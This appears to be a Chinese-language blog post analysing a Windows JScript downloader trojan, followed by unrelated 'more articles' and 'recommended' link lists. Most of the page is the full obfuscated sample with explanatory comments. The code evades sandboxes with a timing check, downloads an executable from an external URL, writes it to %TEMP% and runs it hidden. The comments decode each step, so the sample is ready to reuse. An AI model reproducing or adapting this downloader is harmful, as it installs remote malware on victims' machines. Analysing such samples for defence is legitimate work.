//经过样本分析和抓取,该恶意程序是款下载者木马。

//不懂的可以百度百科。

http://baike.baidu.com/link?url=0dNqFM8QIjEQhD71ofElH0wHGktIQ3sMxer47B4z_54LSHixZYLcNWDgisJAeMRN5yJKjMu3znZc_sMh43cuwK

var uKcZJmztw = "f";

var VLjBZijBRDIxir = "sd";

var mzHiDfbVgtzWL = "uhi";

var XrxesgIWQ = "ya";

var STgtocEaUgS = "f";

var Mccq = "gsd";

var YVFRNFKC = "a7o";

var zokYxgifSUOsDIn = "d8f";

var rysGOQRkJ = "hgs";

var fAJEpxv = "7";

var LzK = "u";

var WnKggbYjhbgaYK = "dfa";

var RQJm = "s";

var tcbpCSVm = "o";

var glYioNGTMO = "a";

var cMleB = "fkj";

var guMAPaymgfr = ";l";

var aWosZJAl = "d";

var rrruwakBVMdHT = "s";

var QcfK = "a"; //asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf

//---------------------------------

var wxGM = "f";

var wME = "sd";

var WYl = "hi";

var DgXr = "yau";

var OFbjPAVgdUDSr = "sdf";

var AKaUjBxV = "g";

var YWyNEBKTCAr = "a7o";

var UmkNXPoXKvV = "8f";

var jrUTHQOJCXz = "d";

var VMrAuxWTPKwLZbj = "hgs";

var hnAKwB = "au7";

var kuRwVoQ = "f";

var OXjw = "d";

var wSaGYFaTjPu = "aos";

var UdT = "j";

var wGKytuRmi = "k";

var FwSAu = ";lf";

var uSsmxvh = "d";

var xrUulSuJwZcZEin = "as";//asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf

////---------------------------------

var fvJysePITGsZ = "f";

var MJLm = "sd";

var OHdTWUSWyLDnD = "hi";

var NfkoHHanka = "au";

var pAJLp = "fy";

var xTeQe = "d";

var wolngRcKPNjI = "s";

var Ctd0 = "og";

var NGJpEc = "a7";

var johMrZhTBT = "f";

var rWRr = "d8";

var xhuyvlXNtG = "gs";

var AoFEsd = "7h";

var IarTKEg = "fau";

var UiCusNVVRYpV = "osd";

var SqXtHDCTAOoEfv = "ja";

var kSXJa = "k";

var AzMZQADlr = ";lf";

var OFZC = "sd";

var UFs = "a";//asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf

//-----------------------------------

var wiM = "ose";

var cdzFN = "l";

var gtVOEyZRPMBkY = "c";//close();

//-----------------------------------

var FKqYCuGSVDKEk = "e";

var yLdfoNQSLG = "Fil";

var Kegv = "o";

var REweUeFfsfzCC = "veT";

var mCxYdwKmDTeZ = "Sa";//savetofile();

//-----------------------------------

var orFCagIxftilPY = "on";

var AnB = "iti";

var OeuDh = "pos";//position

//-----------------------------------

var bxwfUYaplk = "e";

var ZHBIenDJhvi = "t";

var OmwNrBIs = "wri";//write()

//-----------------------------------

var IonAXHdnbsJsHYL = "e";

var svvPS = "typ";//type

//-----------------------------------

var RxDykD = "n";

var ftsB = "ope";//open

//-----------------------------------

var zZoO = "am";

var TSCSrKWiKQY = "tre";

var AIfn = "B.S";

var zbAsfUmIk = "D";

var uWdDgxvOZcUG = "O";

var MUSaOvH = "D";

var YZVOwlzLPfausz = "A";//"adodb.stream"

//-----------------------------------

var pNGkr = "ct";

var iqPSquxJgp = "je";

var bTJnufjW = "b";

var lIexL = "teO";

var kZBJ = "rea";

var derqHNng = "C";//creatobject("adodb.stream") 

var LiTxpjAMHxAgUQ = "4h4";

var WWzPWldMX = "6n";

var CuF0 = "k6j";

var oUHbKSEqhF = "0";

var lQP = "hu/";

var RQUOidonsf = "l.";

var NjKvurbzu = "ta";

var CSyCCMfj = "por";

var XcTxpkvH = "egy";

var aUucLqfydBnSn = "j";

var lTXzk = "ev";

var mpAARoVfxvEsej = ".n";

var NVJeSNhziHjX = "www";

var JFDhyk = "://";

var CFpmRSiBsMp = "p";

var rKP = "htt";//http://www.nevjegyportal.hu/ok6j6n4h4

//-----------------------------------

var uBtUfBIHbmz = "T";

var LwKK = "GE";// get

//-----------------------------------

var KRPXN = "pen";

var HrNtkpOuBMYa = "o";//open

//-----------------------------------

var OFdMpJOyw = "e";

var NlpqQU = "x";

var cZpOdxEyvqRfb = "7.e";

var cLfbaiuobq = "PO";

var XmXyEnhbtWhG = "M1";

var DQZEGAm = "ko";

var cKoUGmrGJtE = "SE";

var QasyJ = "Ky";//KySEKoM1PO7.exe

//-----------------------------------

var eQyCEVqQUazI = "%/";

var tNgKCALxxEpJMf = "P";

var mNYqbv = "M";

var FrwlCZOPjcmJvoE = "E";

var KyNfXZkSc = "%T";//%TEMP%/

//-----------------------------------

var AjbjrFWcHO = "gs";

var RyW = "in";

var LVlachWJa = "Str";

var NGjUy = "t";

var ZXMail = "n";

var XLaaPawDhGaz = "e";

var lRTf = "m";

var EGxwfaNKp = "ron";

var UCOpd = "vi";

var xZQvOWiNMG = "n";

var NLgbSPQIDLAIj = "ndE";

var Gyo = "xpa";

var gPYeoLnn = "E";//expendenvironmentstrings

//-----------------------------------

var kpsxpufDRzihIGv = "TP";

var vGOfgZZdOVh = "T";

var wJOAaSUgz = "LH";

var bPhWMdYs = "XM";

var AwpqZN = "2.";

var RNVidTrApbBfHO = "XML";

var ynXoQhqDiQydxVe = "MS";//msxml2.xmlhttp

//-----------------------------------

var zkeMzwunlwoMdUD = "n";

var oVQABSTeJWqKG = "Ru";

var WkRVEzGFpaMCAC = "ell";

var AoJg = "h";

var HDveUfs = "S";

var PGItzPyn = ".";

var iTVqHxcrEbduDt = "t";

var wxGWFQyhW = "rip";

var KDSFP = "c";

var nzV = "WS";//wscript.shell.run()

//-----------------------------------

var NFFhujLOFwsUs = "ct";

var kvZBOvoVgLSEG = "je";

var DXP = "b";

var zjRmzjunjFUys = "O";

var EcDMPFvaxG = "e";

var stMA = "at";

var KnALPhmOVixZ = "Cre";//createobject()

//-----------------------------------

var aCTc = new Date();

var SZT0 = aCTc.getMilliseconds();

WScript.Sleep(10);

var aCTc = new Date();

var bRDtyPAQicD = aCTc.getMilliseconds();

WScript.Sleep(10);

var aCTc = new Date();

var VrU = aCTc.getMilliseconds();

WScript.Sleep(10);

var aCTc = new Date();

var DEyWdL = aCTc.getMilliseconds();

//

var NdNAj = bRDtyPAQicD - SZT0;

//var NdNAj=new Date().getMilliseconds()-new Date().getMilliseconds();

//

//    10s

var HRORMjJ = VrU - bRDtyPAQicD;

//    10s

var YSc0 = DEyWdL - VrU;

//    10s

WshShell = WScript[KnALPhmOVixZ + stMA + EcDMPFvaxG + zjRmzjunjFUys + DXP + kvZBOvoVgLSEG + NFFhujLOFwsUs](nzV + KDSFP + wxGWFQyhW + iTVqHxcrEbduDt + PGItzPyn + HDveUfs + AoJg + WkRVEzGFpaMCAC);

//wshShell=wscript[createobject](wscript.shell.run);

function jmljvNFWjSplH(NLN){WshShell[oVQABSTeJWqKG + zkeMzwunlwoMdUD](NLN, 0, 0);}

//function jmljvNFWjSplH(NLN)

//{

//    WshShell[run](NLN,0,0);

//}

function OcEOsFHpWS(n){return ynXoQhqDiQydxVe + RNVidTrApbBfHO + AwpqZN + bPhWMdYs + wJOAaSUgz + vGOfgZZdOVh + kpsxpufDRzihIGv;}

//function OcEOsFHpWS(n)

//{

//    return MSxml2.xmlhttp;

//}

if ((NdNAj != HRORMjJ) || (HRORMjJ != YSc0)){fOikDMmzwkAuGlw = WshShell[gPYeoLnn + Gyo + NLgbSPQIDLAIj + xZQvOWiNMG + UCOpd + EGxwfaNKp + lRTf + XLaaPawDhGaz + ZXMail + NGjUy + LVlachWJa + RyW + AjbjrFWcHO](KyNfXZkSc + FrwlCZOPjcmJvoE + mNYqbv + tNgKCALxxEpJMf + eQyCEVqQUazI) + QasyJ + cKoUGmrGJtE + DQZEGAm + XmXyEnhbtWhG + cLfbaiuobq + cZpOdxEyvqRfb + NlpqQU + OFdMpJOyw;

//fOikDMmzwkAuGlw=/%temp%/ path

//WshShell[expendedenvironmentstrings](%temp%);

EFASPqJ = OcEOsFHpWS(0);

//var xmlHTTP=new ActiveObject("Microsoft.XMLHTTP");

wMRqfsrlJdPwT = WScript.CreateObject(EFASPqJ);

//

//xmlhttp object

//[HrNtkpOuBMYa + KRPXN]==open        

wMRqfsrlJdPwT[HrNtkpOuBMYa + KRPXN](LwKK + uBtUfBIHbmz, rKP + CFpmRSiBsMp + JFDhyk + NVJeSNhziHjX + mpAARoVfxvEsej + lTXzk + aUucLqfydBnSn + XcTxpkvH + CSyCCMfj + NjKvurbzu + RQUOidonsf + lQP + oUHbKSEqhF + CuF0 + WWzPWldMX + LiTxpjAMHxAgUQ, false);

//wMRqfsrlJdPwT(get,http://www.nevjegyportal.hu/ok6j6n4h4,false);

//xmlhttp.open("get","url",false);

wMRqfsrlJdPwT.send();

while (wMRqfsrlJdPwT.readystate < 4 ) {WScript.Sleep(1000)};

//readystate

elcHu = WScript[KnALPhmOVixZ + stMA + EcDMPFvaxG + zjRmzjunjFUys + DXP + kvZBOvoVgLSEG + NFFhujLOFwsUs](YZVOwlzLPfausz + MUSaOvH + uWdDgxvOZcUG + zbAsfUmIk + AIfn + TSCSrKWiKQY + zZoO);

//var adoStream=createobject("adodb.stream");

elcHu[HrNtkpOuBMYa + KRPXN]();

//adoStream.open();

elcHu[svvPS + IonAXHdnbsJsHYL] = 1;

//adoStream.type=1;

elcHu[OmwNrBIs + ZHBIenDJhvi + bxwfUYaplk](wMRqfsrlJdPwT.ResponseBody);

//adoStream.write(wMRqfsrlJdPwT.ResponseBody);

elcHu[OeuDh + AnB + orFCagIxftilPY] = 0;

//adoStream.position=0;

elcHu[mCxYdwKmDTeZ + REweUeFfsfzCC + Kegv + yLdfoNQSLG + FKqYCuGSVDKEk](fOikDMmzwkAuGlw, 2 );

//adoStream.savetofile(/%temp%/,2);

elcHu[gtVOEyZRPMBkY + cdzFN + wiM]();

//adoStream.close();

//

jmljvNFWjSplH("/%temp%/");

//WshShell[run](NLN,0,0)

NdNAj = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + new Date().getMilliseconds() + new Date().getMilliseconds();;

//10s

HRORMjJ = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + VrU + bRDtyPAQicD;

//new Date().getMilliseconds() - new Date().getMilliseconds()="asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + new Date().getMilliseconds() + new Date().getMilliseconds();

//10s

YSc0 = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + DEyWdL + VrU;

//10s

}

windows本地script脚本恶意代码分析(带注释)的更多相关文章

  1. 2018-2019-2 20165234 《网络对抗技术》 Exp4 恶意代码分析

    实验四 恶意代码分析 实验目的 1.监控自己系统的运行状态,看有没有可疑的程序在运行. 2.分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生指令或sysinternals ...

  2. 2018-2019-2 网络对抗技术 20165316 Exp4 恶意代码分析

    2018-2019-2 网络对抗技术 20165316 Exp4 恶意代码分析 一.原理与实践说明 1.实践目标 监控你自己系统的运行状态,看有没有可疑的程序在运行. 分析一个恶意软件,就分析Exp2 ...

  3. 2018-2019-2 20165312《网络攻防技术》Exp4 恶意代码分析

    2018-2019-2 20165312<网络攻防技术>Exp4 恶意代码分析 知识点总结 1.有关schtasks schtacks的作用:安排命令和程序定期运行或在指定时间内运行.从计 ...

  4. Exp4 恶意代码分析 20165110

    Exp4 恶意代码分析 20165110 一.实践目标 1.是监控你自己系统的运行状态,看有没有可疑的程序在运行. 2.是分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生 ...

  5. 2018-2019-2 网络对抗技术 20165318 Exp4 恶意代码分析

    2018-2019-2 网络对抗技术 20165318 Exp4 恶意代码分析 原理与实践说明 实践目标 实践内容概述 基础问题回答 实践过程记录 1.使用schtasks指令监控系统 2.使用sys ...

  6. 2018-2019-2 20165330《网络对抗技术》Exp4 恶意代码分析

    目录 基础问题 相关知识 实验目的 实验内容 实验步骤 实验过程中遇到的问题 实验总结与体会 实验目的 监控你自己系统的运行状态,看有没有可疑的程序在运行 分析一个恶意软件,就分析Exp2或Exp3中 ...

  7. 2018-2019-2 20165332 《网络对抗技术》Exp4 恶意代码分析

    2018-2019-2 20165332 <网络对抗技术>Exp4 恶意代码分析 原理与实践说明 1.实践目标 监控你自己系统的运行状态,看有没有可疑的程序在运行. 分析一个恶意软件,就分 ...

  8. 20165223《网络对抗技术》Exp4 恶意代码分析

    目录 -- 恶意代码分析 恶意代码分析说明 实验任务目标 实验内容概述 schtasks命令使用 实验内容 系统运行监控 恶意软件分析 静态分析 virscan分析和VirusTotal分析 PEiD ...

  9. Exp4 恶意代码分析

    一.原理与实践说明 1. 实践目标 1.1 监控你自己系统的运行状态,看有没有可疑的程序在运行. 1.2 分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生指令或sysin ...

随机推荐

  1. Python之路,Day1 - Python基础1

    本节内容 Python介绍 发展史 Python 2 or 3? 安装 Hello World程序 变量 用户输入 模块初识 .pyc是个什么鬼? 数据类型初识 数据运算 表达式if ...else语 ...

  2. js 不同进制之间相互转换

    如果a进制与b进制都不等于10,则十进制作为桥梁进行转换 例如 10进制的数字11 转换为3进制为102 10进制的数字11 转换为4进制为23 现在进行3进制转4进制 1.3进制转10进制 2.10 ...

  3. Win7下Doxygen配置与使用

    1.  下载与安装 1.1 下载 Doxygen官方安装程序及其手册下载地址,目前使用版本为1.8.8. 安装程序:http://www.stack.nl/~dimitri/doxygen/downl ...

  4. node.js + expres 的安装

    一 windows下安装 首先去官网下载msi安装包. 两篇很有参考价值的文章: http://cnodejs.org/topic/4fae80c02e8fb5bc650a8360 http://bl ...

  5. Bootstrap使用初涉

    在这里记录一下搭建Bootstrap的开发环境: 首先手头上的有Bootstrap的相关资料,这里用的是bootstrap-3.3.5-dist. 在开发一个Web项目的时候要将述的资料都导入到项目中 ...

  6. C#知识点总结系列:5、CLR的组成和运转

    clr基本 CLR(Common Language Runtime)是一个可由多种编程语言使用的“运行时”.(例如:c#,c++/cli,vb,f#,ironpython,ironruby,il... ...

  7. virtualbox安装增强功能时【未能加载虚拟光盘】

    virtualbox安装增强功能时[未能加载虚拟光盘] 今天在使用Virtualbox中的Ubuntu虚拟机,想安装增强功能来实现更改分辨率,但是在安装时出错:未能加载虚拟光驱 VBoxsGuestA ...

  8. Polly

    Polly Polly is a .NET 3.5 / 4.0 / 4.5 / PCL (Profile 259) library that allows developers to express ...

  9. Lucene 简单API使用

    本demo 简单模拟实现一个图书搜索功能. 模拟向数据库添加数据的时候,添加书籍索引. 提供搜索接口,支持按照书名,作者,内容进行搜索. 按默认规则排序返回搜索结果. Jar依赖: <prope ...

  10. ajax post 请求415\ 400 错误

    今天用ajax 向后台发送 post请求时,出现了两个问题: 1, 发送请求后,控制台 返回  Unsupported media type-415(不支持的媒体类型),这时突然想起来,post 请求 ...